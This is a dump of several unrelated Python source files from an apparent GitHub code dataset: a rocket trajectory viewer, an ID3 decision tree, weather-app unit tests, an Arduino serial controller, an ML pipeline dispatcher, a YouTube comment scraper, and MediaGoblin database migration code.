self.ui.load_param_title.setText('パラメータファイル(json)')\n return\n \n self.ui.load_param_title.setText(filename)\n self.param_file = filename\n return filename\n \n def load_eventlog(self):\n filename = self.ui.show_file_dialog('���ベントログファイルを選択', './', '*.json')\n if filename == '':\n self.ui.load_evlog_title.setText('パラメータファイル(json)')\n return\n \n self.ui.load_evlog_title.setText(filename)\n self.evlog_file = filename\n return filename\n\n def plot_events(self):\n n_events = len(self.evlog)\n event_points = np.zeros((n_events, 3))\n event_texts = []\n i = 0\n for name, value in self.evlog.items():\n if not 't' in value:\n continue\n t = value['t']\n r = self.r(t)\n event_points[i] = r\n event_texts.append(name)\n i += 1\n \n self.trajec_event_markers.set_data(event_points, face_color='white', edge_color='yellow', size=10.0)\n\n text_points = event_points + np.array([0.5, 0, 0])\n # if self.trajec_event_texts is not None:\n # self.trajec_event_texts = \n self.trajec_event_texts = visuals.Text(event_texts, color='yellow', font_size=128, pos=text_points)\n self.view.add(self.trajec_event_texts)\n\n def setup_rendering(self):\n # パラメータ,飛翔履歴,3Dモデルを読み込んで描画設定を行う\n try:\n if 
self.obj_file != '':\n # self.rocket_model = RocketMesh(self.obj_file)\n self.rocket_model.load_model(self.obj_file)\n else:\n # デフォルトモデルを読み込み\n std_model_path = os.path.join(THIS_FILE_DIR, 'samples/std_scale.obj')\n print(' obj file:', std_model_path)\n # self.obj_file = std_model_path\n self.rocket_model.load_model(std_model_path)\n except FileNotFoundError:\n print('obj file was not found.')\n self.ui.load_obj_title.setText('独自ロケットモデル (obj)')\n return\n\n try:\n if self.trajec_file != '':\n df = pd.read_csv(self.trajec_file)\n else:\n print('Trajectory file is not specified.')\n return\n except FileNotFoundError:\n print('Trajectory file: '+self.trajec_file+' was not found.')\n self.ui.load_trajec_title.setText('飛翔履歴ファイル(csv)')\n return\n\n try:\n if self.param_file != '':\n with open(self.param_file) as f:\n self.param = json.load(f)\n else:\n print('Parameter file is not specified.')\n return\n except FileNotFoundError:\n print('Parameter file: '+self.param_file+' was not found.')\n self.ui.load_trajec_title.setText('パラメータファイル(json)')\n return\n\n try:\n if self.evlog_file != '':\n with open(self.evlog_file) as f:\n self.evlog = json.load(f)\n else:\n print('Eventlog file is not specified.')\n return\n except FileNotFoundError:\n print('Eventlog file: '+self.evlog_file+' was not found.')\n self.ui.load_evlog_title.setText('イベントログ・ファイル(json)')\n return\n\n self.trajec_df = df\n # 弾道履歴データを展開\n t = np.array(df['t'])\n self.t = t\n r_array = np.array(df.loc[:, 'x':'z'])\n v_array = np.array(df.loc[:, 'vx':'vz'])\n w_array = np.array(df.loc[:, 'wx':'wz'])\n q_array = np.array(df.loc[:, 'qx':'qw'])\n # 補間\n self.r = interp1d(t, r_array, kind='linear', axis=0, fill_value='extrapolate')\n self.v = interp1d(t, v_array, kind='linear', axis=0, fill_value='extrapolate')\n self.w = interp1d(t, w_array, kind='linear', axis=0, fill_value='extrapolate')\n self.q = interp1d(t, q_array, kind='linear', axis=0, fill_value='extrapolate')\n\n # CG値分モデルを移動\n self.rocket_model.set_CG_pos(np.array([self.param['CG_dry'], 0.0, 0.0]))\n\n # デフォルトのモデルを読み込む場合,モデルをスケーリング\n if self.obj_file == '':\n scale_vec = np.array([self.param['height'], self.param['diameter'], self.param['diameter']])\n self.rocket_model.set_scale(scale_vec)\n\n # ui内容アップデート\n self.ui.t_slider.setMaximum(int(t[-1]/self._slider_dt))\n self.rocket_model.move(self.r(0.0), self.q(0.0))\n\n self.trajec_plot_model = visuals.LinePlot(r_array, color='blue')\n\n self.plot_events()\n\n self.view.add(self.trajec_plot_model)\n self.view.add(self.trajec_event_markers)\n self.view.add(self.trajec_event_texts)\n\n if self.use_pre_rendering:\n self._vertices_buffering()\n else:\n self._ready = True\n\n return\n\n def isReady(self):\n # return self._param_loaded and self._trajec_loaded\n return self._ready\n \n def update_at_t(self, t):\n if not self.isReady():\n return\n\n _v = self.v(t)\n _r = self.r(t)\n _w = self.w(t)\n _q = self.q(t)\n\n self.ui.t_text.setText(str(t))\n self.ui.r_text.setText(f\"{_r[0]:.3f}, {_r[1]:.3f}, {_r[2]:.3f}\")\n self.ui.v_norm_text.setText(f\"{np.linalg.norm(_v):.4f}\")\n self.ui.v_text.setText(f\"{_v[0]:.3f}, {_v[1]:.3f}, {_v[2]:.3f}\")\n self.ui.w_text.setText(f\"{_w[0]:.3f}, {_w[1]:.3f}, {_w[2]:.3f}\")\n\n if self.use_pre_rendering:\n self.rocket_model.set_vertices(self.vertices[int(t/self._slider_dt)])\n else:\n self.rocket_model.move(_r, _q)\n\n self.camera.center = _r\n\n def _playback_update(self):\n if self._current_t >= self.t[-1]:\n self._current_t = 0.0\n\n t = self._current_t\n # sliderにsetValueすると 
value_changedが呼ばれる\n self.ui.t_slider.setValue(int(t/self._slider_dt))\n self._current_t += self._slider_dt\n\n def on_start_clicked(self):\n if not self.isReady():\n return\n\n self._playback_mode = True\n self._playback_timer.timeout.connect(self._playback_update)\n self._playback_timer.start(10)\n \n def on_pause_clicked(self):\n if not self.isReady():\n return\n \n self._playback_timer.stop()\n self._playback_mode = False\n \n def on_stop_clicked(self):\n if not self.isReady():\n return\n\n self._playback_timer.stop()\n self._current_t = 0.0\n self.update_at_t(0)\n self.ui.t_slider.setValue(0)\n self._playback_mode = False\n\n def on_slider_changed(self, value):\n if not self.isReady():\n return\n\n self._current_t = value*self._slider_dt\n self.update_at_t(self._current_t)\n \n def _vertices_buffering(self):\n t_array = np.arange(0.0, self.t[-1], self._slider_dt)\n vertices_origin = (self.rocket_model.vertices + self.rocket_model.CG_pos).T\n # vertices_origin: (3, n_vertices), vertices: (n_time, n_vertices, 3)\n vertices = np.zeros((len(t_array), vertices_origin.shape[1], vertices_origin.shape[0]))\n print(' vertices buffering ')\n print(' origin vertices shape:', vertices_origin.shape)\n print(' total vertices shape: ', vertices.shape)\n\n i = 0\n lim = len(t_array)\n\n timer = QTimer(self.ui)\n def _calc_vertices():\n nonlocal i\n t = t_array[i]\n _q = quaternion.as_quat_array(self.q(t))\n Tdc = quaternion.as_rotation_matrix(_q)\n pos = self.r(t)\n\n vertices[i] = np.dot(Tdc, vertices_origin).T + pos\n i += 1\n\n self.ui.progress_bar.setValue(int(i/lim * 100))\n if i >= len(t_array):\n timer.stop()\n self._ready = True\n\n timer.timeout.connect(_calc_vertices)\n timer.start()\n self.vertices = vertices\n\n\nif __name__ == '__main__':\n # load config params\n try:\n with open(CONFIG_FILE) as f:\n config = json.load(f)\n except FileNotFoundError:\n print('config file not found.')\n config = {\n 'pre_rendering': True\n }\n\n vispy.use('pyqt5')\n canvas = scene.SceneCanvas(keys=\"interactive\", size=(1200, 800), show=False)\n camera = scene.TurntableCamera(up='+z')\n\n myui = MyUi()\n\n handler = UIHandler(myui, canvas, camera, use_pre_rendering=config['pre_rendering'])\n\n canvas.app.run()","repo_name":"PLANET-Q/TrajecViewer","sub_path":"trajec_viewer.py","file_name":"trajec_viewer.py","file_ext":"py","file_size_in_byte":16225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4294704316","text":"from math import log\nimport collections\n\n\ndef createDataSet():\n dataSet = [[0, 0, 0, 0, 'no'], \n [0, 0, 0, 1, 'no'],\n [0, 1, 0, 1, 'yes'],\n [0, 1, 1, 0, 'yes'],\n [0, 0, 0, 0, 'no'],\n [1, 0, 0, 0, 'no'],\n [1, 0, 0, 1, 'no'],\n [1, 1, 1, 1, 'yes'],\n [1, 0, 1, 2, 'yes'],\n [1, 0, 1, 2, 'yes'],\n [2, 0, 1, 2, 'yes'],\n [2, 0, 1, 1, 'yes'],\n [2, 1, 0, 1, 'yes'],\n [2, 1, 0, 2, 'yes'],\n [2, 0, 0, 0, 'no']]\n charas = ['年龄', '有工作', '有自己的房子', '信贷情况']\n return dataSet, charas\n\ndef calLabelProbability(dataSet:list):\n '''计算一个子集中各label的概率'''\n data_size = len(dataSet)\n labels = [data[-1] for data in dataSet]\n count = {}\n P = {}\n for label in labels:\n if label in count:\n count[label] += 1\n else:\n count[label] = 1\n for label in count:\n P[label] = float(count[label] / data_size)\n return P\n\ndef calCharaProbability(dataSet:list, index:int):\n '''计算一个子集中根据某chara的概率'''\n data_size = len(dataSet)\n count = collections.Counter([data[index] for data in dataSet])\n \n P = {}\n for key in count:\n P[key] = float(count[key] / 
data_size)\n \n return P\n\ndef calEntropy(dataSet:list):\n '''计算H, H=-Σpi*logpi'''\n P = calLabelProbability(dataSet)\n entropy = 0\n \n for label in P:\n entropy -= P[label] * log(P[label], 2)\n\n return entropy\n\ndef calInformationGain(dataSet:list, index:int):\n '''计算信息增益g=H(D)-H(D|A)'''\n empirical_entropy = calEntropy(dataSet=dataSet)\n empirical_conditional_entropy = 0\n P = calCharaProbability(dataSet, index)\n for key in P:\n childSet = []\n for data in dataSet:\n if data[index] == key:\n childSet.append(data)\n empirical_conditional_entropy += P[key] * calEntropy(childSet)\n return empirical_entropy - empirical_conditional_entropy\n\ndef chooseBestChara(dataSet:list, charas:list):\n\n charas_size = len(charas)\n G = []\n for i in range(charas_size):\n G.append(calInformationGain(dataSet, i))\n print(\"chara \" + str(i) + \" \" + str(calInformationGain(dataSet, i)))\n best_chara_index = G.index(max(G))\n return best_chara_index\n\ndef splitDataSet(dataSet:list, index:int, value:int):\n\n retDataSet = [] \n for featVec in dataSet: \n if featVec[index] == value:\n reducedFeatVec = featVec[:index] \n reducedFeatVec.extend(featVec[index+1:]) \n retDataSet.append(reducedFeatVec)\n return retDataSet\n\ndef generateTree(dataSet:list, charas:list, bestCharas:list):\n\n data_size = len(dataSet)\n labels = [data[-1] for data in dataSet]\n labels_count = collections.Counter(labels)\n labels_count_sorted = sorted(labels_count.items(), key=lambda d:d[1], reverse = True)\n if len(labels_count) == 1: # 即该(子)数据集中只有一类\n return labels[0]\n if len(dataSet[0]) == 1: # 即该(子)数据集中特征为空\n return labels_count_sorted.values()[0]\n best_chara_index = chooseBestChara(dataSet, charas)\n best_chara = charas[best_chara_index]\n bestCharas.append(best_chara)\n tree = {best_chara:{}}\n del(charas[best_chara_index])\n chara_values = [data[best_chara_index] for data in dataSet]\n unique_vals = set(chara_values)\n for val in unique_vals:\n charas_sub = charas[:]\n tree[best_chara][val] = generateTree(splitDataSet(dataSet, best_chara_index, val), charas_sub, bestCharas)\n return tree\n\nif __name__ == \"__main__\":\n\n dataSet, charas = createDataSet()\n best_charas = []\n print(generateTree(dataSet, charas, best_charas))","repo_name":"b-bad/Machine-Learning","sub_path":"decision tree/ID3.py","file_name":"ID3.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74664287173","text":"import unittest\nfrom datetime import datetime\nimport requests\nimport project\nfrom project import CityTemperature\n\nclass TestProgram(unittest.TestCase):\n # Рандомні дані для тестів\n data = [\n CityTemperature(\"Харків\", 20, datetime.now().replace(microsecond=0)),\n CityTemperature(\"Київ\", 17, datetime.now().replace(microsecond=0)),\n CityTemperature(\"Львів\", 18, datetime.now().replace(microsecond=0)),\n CityTemperature(\"Одеса\", 15, datetime.now().replace(microsecond=0))\n ]\n \n # Щоб дані правильно зберігалися і завантажувалися\n def test_saving_and_loading_from_file(self):\n project.save(self.data)\n self.assertEqual(self.data, project.load())\n \n # Повинно бути Одеса\n def test_smallest(self):\n self.assertEqual(self.data[3], project.smallest(self.data))\n \n # Повинно бути Харків\n def test_biggest(self):\n self.assertEqual(self.data[0], project.biggest(self.data))\n \n # Порівняння з вбудованим алгоритмом sorted()\n def test_sort(self):\n sorted_data_copy = sorted(self.data.copy(), key=lambda city: city.temperature)\n 
project.sort(self.data)\n self.assertEqual(sorted_data_copy, self.data)\n \n # Всі статус-коди http-запитів повинні бути 200 (ОК)\n def test_city_names_validity(self):\n with open(\"token.txt\", \"r\") as file:\n token = file.read()\n statuses = []\n with requests.Session() as session:\n for eng_name in project.name_mappings.values():\n response = session.get(f\"https://api.openweathermap.org/data/2.5/weather?q={eng_name}&appid={token}\")\n statuses.append(response.status_code)\n self.assertEqual(statuses, [200 for _ in range(25)])\n ","repo_name":"altersaber0/ukrainian-cities-air-temperatures","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18314984311","text":"\nimport threading\nimport serial \nimport time\n\nglobal incomingByte\n#mutex = threading.Lock()\n\ndef create_porta():\n global portaUSB\n aux = '/dev/ttyACM0'\n try:\n portaUSB = serial.Serial(aux, 9600, timeout=1)\n except:\n print('conexao nao estabelecida')\n\ndef chave():\n global incomingByte\n #i = 0\n while(1):\n #mutex.acquire()\n incomingByte = portaUSB.read().rstrip().decode('CP1252')\n #print(incomingByte)\n #i = i + 1\n #mutex.release()\n\ndef sen_command(cod):\n aux = str(cod)\n portaUSB.write(aux.encode())\n\ndef comandoFarois():\n\n global incomingByte\n print('TESTE')\n #mutex.acquire()\n if(incomingByte == 'F'):\n sen_command('ligar farois')\n print('LIGA FAROIS')\n else:\n sen_command('desligar farois')\n print('DESLIGA FAROIS')\n #mutex.release()\n\n\n# CRIAÇÃO DAS THREADS\nTchave = threading.Thread(target=chave)\nligafarois = threading.Thread(target=comandoFarois)\n\n# CHAMADAS DE FUNÇÕES\ncreate_porta()\n\n# INICIANDO AS THREADS\nTchave.start()\nligafarois.start()\n\nwhile Tchave.isAlive():\n print(\"Thread da chave esta funcionando\")\n time.sleep(5)\n","repo_name":"iigorpaiva/painel","sub_path":"painel.py","file_name":"painel.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20186621924","text":"import pickle\nimport numpy as np\nimport pandas as pd\n\nfrom components.data_balancing import Balancing\nfrom components.data_cleaning import Cleaning\nfrom components.explainability import Explainability\nfrom components.feature_scaling import Scaling\nfrom components.feature_selection import Selection\nfrom components.metrics import Metrics\nfrom components.classification import Classification\nfrom components.setup import Setup\nfrom components.validation import Validation\n\n\nclass Dispatcher:\n\n def __init__(self, data, path, to_predict, path_training):\n self.data = data\n self.dir_path = path\n self.dataset_to_predict = to_predict\n self.path_training = path_training\n\n def start(self):\n # Data setup\n data = Setup().data_setup(self.path_training, training=True)\n\n # Data Cleaning\n data, filename_column = Cleaning().cleaning(data, self.data['Data Cleaning'])\n columns = data.columns\n best_prediction = None\n\n # Validation - Train/Test Split\n if self.data['Validation'] == \"ttsplit\":\n x_training, x_testing, y_training, y_testing = Validation().data_validation(data, self.data['Validation'])\n\n x_training = x_training[:, :-1]\n x_testing = x_testing[:, :-1]\n\n # Feature Scaling\n self.scaler, x_training, x_testing = Scaling().scaling(x_training, x_testing, self.data['Feature Scaling'])\n\n # Feature Selection\n if self.data['Feature Selection'] 
== \"kbest\":\n self.selector, x_training, x_testing, self.selected_features = Selection().selection(x_training, x_testing,\n columns, y_training, y_testing, self.data['Feature Selection'],\n self.data[\"K\"])\n else:\n self.selector, x_training, x_testing, self.selected_features = Selection().selection(x_training,\n x_testing,\n columns,\n y_training,\n y_testing,\n self.data[\n 'Feature Selection'])\n\n x_training = np.hstack((x_training, y_training.reshape(-1, 1)))\n # Data Balancing\n x_training, y_training, self.balancer = Balancing().dataBalancing(x_training, y_training, self.data['Data Balancing'])\n\n x_training = x_training[:, :-1]\n # Model classification\n self.prediction, self.classifier = Classification().data_classification(x_training, x_testing, y_training,\n self.data['Classifier'])\n\n # Metrics calculation\n print(\"Validation metrics:\")\n Metrics().metrics(y_testing, self.prediction)\n\n if self.selected_features is None:\n self.selected_features = columns.delete(-1)\n\n # Model explanation\n Explainability().explainability(x_training, x_testing, y_testing, self.prediction, self.classifier, self.selected_features,\n self.data['Explanation Method'])\n\n # Validation - Standard or Stratified K Fold Validation\n else:\n indexes, data, labels = Validation().data_validation(data, self.data['Validation'])\n best_accuracy = 0\n best_precision = 0\n best_recall = 0\n best_f1 = 0\n best_mean = 0\n fold = 1\n best_fold = 0\n\n for training_index, testing_index in indexes:\n print(\"\\nFold #\" + str(fold))\n x_training, x_testing = data[training_index], data[testing_index]\n y_training, y_testing = labels[training_index], labels[testing_index]\n\n y_training = np.argmax(y_training, axis=1)\n y_testing = np.argmax(y_testing, axis=1)\n\n x_training = x_training[:, :-1]\n x_testing = x_testing[:, :-1]\n\n # Feature Scaling\n scaler, x_training, x_testing = Scaling().scaling(x_training, x_testing, self.data['Feature Scaling'])\n\n # Feature Selection\n if self.data['Feature Selection'] == \"kbest\":\n selector, x_training, x_testing, selected_features = Selection().selection(x_training,\n x_testing,\n columns,\n y_training,\n y_testing,\n self.data[\n 'Feature Selection'],\n self.data[\"K\"])\n else:\n selector, x_training, x_testing, selected_features = Selection().selection(x_training,\n x_testing,\n columns,\n y_training,\n y_testing,\n self.data[\n 'Feature Selection'])\n\n # Data Balancing\n x_training = np.hstack((x_training, y_training.reshape(-1, 1)))\n x_training, y_training, self.balancer = Balancing().dataBalancing(x_training, y_training, self.data['Data Balancing'])\n x_training = x_training[:, :-1]\n\n # Model classification\n prediction, classifier = Classification().data_classification(x_training, x_testing, y_training, self.data['Classifier'])\n\n\n # Metrics calculation\n accuracy, precision, recall, f1 = Metrics().metrics(y_testing, prediction)\n if (accuracy + precision + recall + f1)/4 > best_mean:\n best_mean = (accuracy + precision + recall + f1)/4\n best_accuracy = accuracy\n best_precision = precision\n best_recall = recall\n best_f1 = f1\n best_fold = fold\n best_prediction = prediction\n self.classifier = classifier\n self.scaler = scaler\n self.selector = selector\n self.prediction = prediction\n self.features_testing = x_testing\n self.testing_labels = y_testing\n self.selected_features = selected_features\n fold += 1\n\n print(\"\\nBest fold: #\" + str(best_fold))\n print(\"Accuracy: \" + \"{:.2%}\".format(float(best_accuracy)))\n print(\"Precision: \" + 
\"{:.2%}\".format(float(best_precision)))\n print(\"Recall: \" + \"{:.2%}\".format(float(best_recall)))\n print(\"F1: \" + \"{:.2%}\".format(float(best_f1)))\n\n\n # Model explanation\n Explainability().explainability(x_training, self.features_testing, self.testing_labels, self.prediction, self.classifier, self.selected_features,\n self.data['Explanation Method'])\n\n # Saving splitted data, model, preprocessing components and model prediction\n pd.DataFrame(x_training).to_csv(self.dir_path + \"/x_training.csv\")\n pd.DataFrame(y_training).to_csv(self.dir_path + \"/y_training.csv\")\n pd.DataFrame(x_testing).to_csv(self.dir_path + \"/x_testing.csv\")\n pd.DataFrame(y_testing).to_csv(self.dir_path + \"/y_testing.csv\")\n\n pickle.dump(self.scaler, open(self.dir_path + \"/scaler.sav\", 'wb'))\n if self.selector is not None:\n pickle.dump(self.selector, open(self.dir_path + \"/selector.sav\", 'wb'))\n if self.balancer is not None:\n pickle.dump(self.balancer, open(self.dir_path + \"/balancer.sav\", 'wb'))\n pickle.dump(self.classifier, open(self.dir_path + \"/classifier.sav\", 'wb'))\n if best_prediction is not None:\n pd.DataFrame(best_prediction).to_csv(self.dir_path + \"/prediction.csv\")\n else:\n pd.DataFrame(self.prediction).to_csv(self.dir_path + \"/prediction.csv\")\n\n\n # Final prediction on another test set\n print(\"\\n\\nPrediction on input data...\")\n self.dataset_to_predict, prediction_filename_column = Cleaning().cleaning(self.dataset_to_predict, self.data['Data Cleaning'])\n self.dataset_to_predict = self.scaler.fit_transform(self.dataset_to_predict)\n columns_predict = columns[:-1]\n if self.selector is None and self.data['Feature Selection'] != \"default\":\n self.dataset_to_predict = pd.DataFrame(self.dataset_to_predict, columns=columns_predict)\n self.dataset_to_predict = self.dataset_to_predict.loc[:, self.selected_features]\n elif self.data['Feature Selection'] != \"default\":\n self.dataset_to_predict = self.selector.transform(self.dataset_to_predict)\n predictions = self.classifier.predict(self.dataset_to_predict)\n\n # Normalizing 'vulnerable' column and adding it to the dataset\n get_first_char = np.vectorize(lambda x: int(np.floor(x)))\n predictions = get_first_char(predictions)\n complete_dataset = self.dataset_to_predict\n complete_dataset = pd.DataFrame(complete_dataset)\n complete_dataset.insert(len(complete_dataset.columns), \"vulnerable\", predictions)\n\n complete_dataset = complete_dataset.reindex(['filename', *complete_dataset.columns],\n axis=1).assign(filename=prediction_filename_column.to_list())\n complete_dataset.to_csv(self.dir_path + \"/generated_dataset.csv\", index=False)\n\n\n\n\n\n\n\n","repo_name":"CicaMatt/Sentry","sub_path":"dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":11111,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"41274623890","text":"# -*- coding: utf-8 -*-\n\"\"\"\n#based on:\n\n#this code scraps comments from youtube videos and filters out comments with latin characters\n\n#Dec 13 2018\n\"\"\"\n\nimport time\nfrom selenium import webdriver\nfrom contextlib import closing\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport pandas as pd\nlatin_letters = 
{}\nimport unicodedata as ud\n\nchrome_options = Options() \nchrome_options.add_argument(\"--headless\")\n\ndef get_comments(url,rng=3):\n comments = []\n #read comments \n with closing(webdriver.Chrome(ChromeDriverManager().install())) as driver:\n wait = WebDriverWait(driver,10)\n driver.get(url)\n \n for item in range(rng): #by increasing the highest range you can get more content\n wait.until(EC.visibility_of_element_located((By.TAG_NAME, \"body\"))).send_keys(Keys.END)\n time.sleep(3)\n \n for comment in wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, \"#comment #content-text\"))):\n comments.append(comments.text) \n #return comments as list\n return comments\n\n\ndef run_parser(sources_csv='../data/yt_source.csv', comments_csv='../data/yt_comments.csv'):\n #open source file for url\n yt_source = pd.read_csv(sources_csv)\n yt_comments = pd.read_csv(comments_csv)\n #read comments \n for i, row in yt_source.iterrows():\n if not row.processed:\n comments = get_comments(row.url,13)\n yt_source.set_value(i,'comments_fetched',len(comments))\n yt_source.set_value(i,'processed',1)\n #update comments file\n tmp = pd.DataFrame(comments, columns=['comment'])\n tmp['id'] = row.id\n yt_comments = yt_comments.append(tmp)\n\n #save files\n yt_source.to_csv(sources_csv,index=False)\n yt_comments.to_csv(comments_csv,index=False)\n \ndef filter_latin(comments):\n comments['isLatin'] = [only_roman_chars(thing) for thing in comments.comment]\n filtered = comments.loc[comments.isLatin!=True][['comment','id']]\n return filtered \n\ndef is_latin(uchr):\n try: return latin_letters[uchr]\n except KeyError:\n return latin_letters.setdefault(uchr, 'LATIN' in ud.name(uchr))\n \ndef only_roman_chars(unistr):\n return all(is_latin(uchr) for uchr in unistr if uchr.isalpha())\n ","repo_name":"millzon/wordcloud-am","sub_path":"commentsParser.py","file_name":"commentsParser.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73777510531","text":"from __future__ import unicode_literals\n\nimport logging\nimport os\n\nfrom alembic import command\nfrom alembic.config import Config\nfrom alembic.migration import MigrationContext\n\nfrom mediagoblin.db.base import Base\nfrom mediagoblin.tools.common import simple_printer\nfrom sqlalchemy import Table\nfrom sqlalchemy.sql import select\n\nlog = logging.getLogger(__name__)\n\n\nclass TableAlreadyExists(Exception):\n pass\n\n\nclass AlembicMigrationManager(object):\n\n def __init__(self, session):\n root_dir = os.path.abspath(os.path.dirname(os.path.dirname(\n os.path.dirname(__file__))))\n alembic_cfg_path = os.path.join(root_dir, 'alembic.ini')\n self.alembic_cfg = Config(alembic_cfg_path)\n self.session = session\n\n def get_current_revision(self):\n context = MigrationContext.configure(self.session.bind)\n return context.get_current_revision()\n\n def upgrade(self, version):\n return command.upgrade(self.alembic_cfg, version or 'head')\n\n def downgrade(self, version):\n if isinstance(version, int) or version is None or version.isdigit():\n version = 'base'\n return command.downgrade(self.alembic_cfg, version)\n\n def stamp(self, revision):\n return command.stamp(self.alembic_cfg, revision=revision)\n\n def init_tables(self):\n Base.metadata.create_all(self.session.bind)\n # load the Alembic configuration and generate the\n # version table, \"stamping\" it with the most recent rev:\n # XXX: we need to find a better way to detect current installations\n 
# using sqlalchemy-migrate because we don't have to create all table\n # for them\n command.stamp(self.alembic_cfg, 'head')\n\n def init_or_migrate(self, version=None):\n # XXX: we need to call this method when we ditch\n # sqlalchemy-migrate entirely\n # if self.get_current_revision() is None:\n # self.init_tables()\n self.upgrade(version)\n\n\nclass MigrationManager(object):\n \"\"\"\n Migration handling tool.\n\n Takes information about a database, lets you update the database\n to the latest migrations, etc.\n \"\"\"\n\n def __init__(self, name, models, foundations, migration_registry, session,\n printer=simple_printer):\n \"\"\"\n Args:\n - name: identifier of this section of the database\n - session: session we're going to migrate\n - migration_registry: where we should find all migrations to\n run\n \"\"\"\n self.name = name\n self.models = models\n self.foundations = foundations\n self.session = session\n self.migration_registry = migration_registry\n self._sorted_migrations = None\n self.printer = printer\n\n # For convenience\n from mediagoblin.db.models import MigrationData\n\n self.migration_model = MigrationData\n self.migration_table = MigrationData.__table__\n\n @property\n def sorted_migrations(self):\n \"\"\"\n Sort migrations if necessary and store in self._sorted_migrations\n \"\"\"\n if not self._sorted_migrations:\n self._sorted_migrations = sorted(\n self.migration_registry.items(),\n # sort on the key... the migration number\n key=lambda migration_tuple: migration_tuple[0])\n\n return self._sorted_migrations\n\n @property\n def migration_data(self):\n \"\"\"\n Get the migration row associated with this object, if any.\n \"\"\"\n return self.session.query(\n self.migration_model).filter_by(name=self.name).first()\n\n @property\n def latest_migration(self):\n \"\"\"\n Return a migration number for the latest migration, or 0 if\n there are no migrations.\n \"\"\"\n if self.sorted_migrations:\n return self.sorted_migrations[-1][0]\n else:\n # If no migrations have been set, we start at 0.\n return 0\n\n @property\n def database_current_migration(self):\n \"\"\"\n Return the current migration in the database.\n \"\"\"\n # If the table doesn't even exist, return None.\n if not self.migration_table.exists(self.session.bind):\n return None\n\n # Also return None if self.migration_data is None.\n if self.migration_data is None:\n return None\n\n return self.migration_data.version\n\n def set_current_migration(self, migration_number=None):\n \"\"\"\n Set the migration in the database to migration_number\n (or, the latest available)\n \"\"\"\n self.migration_data.version = migration_number or self.latest_migration\n self.session.commit()\n\n def migrations_to_run(self):\n \"\"\"\n Get a list of migrations to run still, if any.\n \n Note that this will fail if there's no migration record for\n this class!\n \"\"\"\n assert self.database_current_migration is not None\n\n db_current_migration = self.database_current_migration\n \n return [\n (migration_number, migration_func)\n for migration_number, migration_func in self.sorted_migrations\n if migration_number > db_current_migration]\n\n\n def init_tables(self):\n \"\"\"\n Create all tables relative to this package\n \"\"\"\n # sanity check before we proceed, none of these should be created\n for model in self.models:\n # Maybe in the future just print out a \"Yikes!\" or something?\n if model.__table__.exists(self.session.bind):\n raise TableAlreadyExists(\n u\"Intended to create table '%s' but it already exists\" %\n 
model.__table__.name)\n\n self.migration_model.metadata.create_all(\n self.session.bind,\n tables=[model.__table__ for model in self.models])\n\n def populate_table_foundations(self):\n \"\"\"\n Create the table foundations (default rows) as layed out in FOUNDATIONS\n in mediagoblin.db.models\n \"\"\"\n for Model, rows in self.foundations.items():\n self.printer(u' + Laying foundations for %s table\\n' % \n (Model.__name__))\n for parameters in rows:\n new_row = Model(**parameters)\n self.session.add(new_row)\n\n def create_new_migration_record(self):\n \"\"\"\n Create a new migration record for this migration set\n \"\"\"\n migration_record = self.migration_model(\n name=self.name,\n version=self.latest_migration)\n self.session.add(migration_record)\n self.session.commit()\n\n def dry_run(self):\n \"\"\"\n Print out a dry run of what we would have upgraded.\n \"\"\"\n if self.database_current_migration is None:\n self.printer(\n u'~> Woulda initialized: %s\\n' % self.name_for_printing())\n return u'inited'\n\n migrations_to_run = self.migrations_to_run()\n if migrations_to_run:\n self.printer(\n u'~> Woulda updated %s:\\n' % self.name_for_printing())\n\n for migration_number, migration_func in migrations_to_run():\n self.printer(\n u' + Would update %s, \"%s\"\\n' % (\n migration_number, migration_func.func_name))\n\n return u'migrated'\n \n def name_for_printing(self):\n if self.name == u'__main__':\n return u\"main mediagoblin tables\"\n else:\n return u'plugin \"%s\"' % self.name\n\n def init_or_migrate(self):\n \"\"\"\n Initialize the database or migrate if appropriate.\n\n Returns information about whether or not we initialized\n ('inited'), migrated ('migrated'), or did nothing (None)\n \"\"\"\n assure_migrations_table_setup(self.session)\n\n # Find out what migration number, if any, this database data is at,\n # and what the latest is.\n migration_number = self.database_current_migration\n\n # Is this our first time? Is there even a table entry for\n # this identifier?\n # If so:\n # - create all tables\n # - create record in migrations registry\n # - print / inform the user\n # - return 'inited'\n if migration_number is None:\n self.printer(u\"-> Initializing %s... \" % self.name_for_printing())\n\n self.init_tables()\n # auto-set at latest migration number\n self.create_new_migration_record()\n self.printer(u\"done.\\n\")\n self.populate_table_foundations()\n self.set_current_migration()\n return u'inited'\n\n # Run migrations, if appropriate.\n migrations_to_run = self.migrations_to_run()\n if migrations_to_run:\n self.printer(\n u'-> Updating %s:\\n' % self.name_for_printing())\n for migration_number, migration_func in migrations_to_run:\n self.printer(\n u' + Running migration %s, \"%s\"... ' % (\n migration_number, migration_func.__name__))\n migration_func(self.session)\n self.set_current_migration(migration_number)\n self.printer('done.\\n')\n\n return u'migrated'\n\n # Otherwise return None. Well it would do this anyway, but\n # for clarity... ;)\n return None\n\n\nclass RegisterMigration(object):\n \"\"\"\n Tool for registering migrations\n\n Call like:\n\n @RegisterMigration(33)\n def update_dwarves(database):\n [...]\n\n This will register your migration with the default migration\n registry. Alternately, to specify a very specific\n migration_registry, you can pass in that as the second argument.\n\n Note, the number of your migration should NEVER be 0 or less than\n 0. 
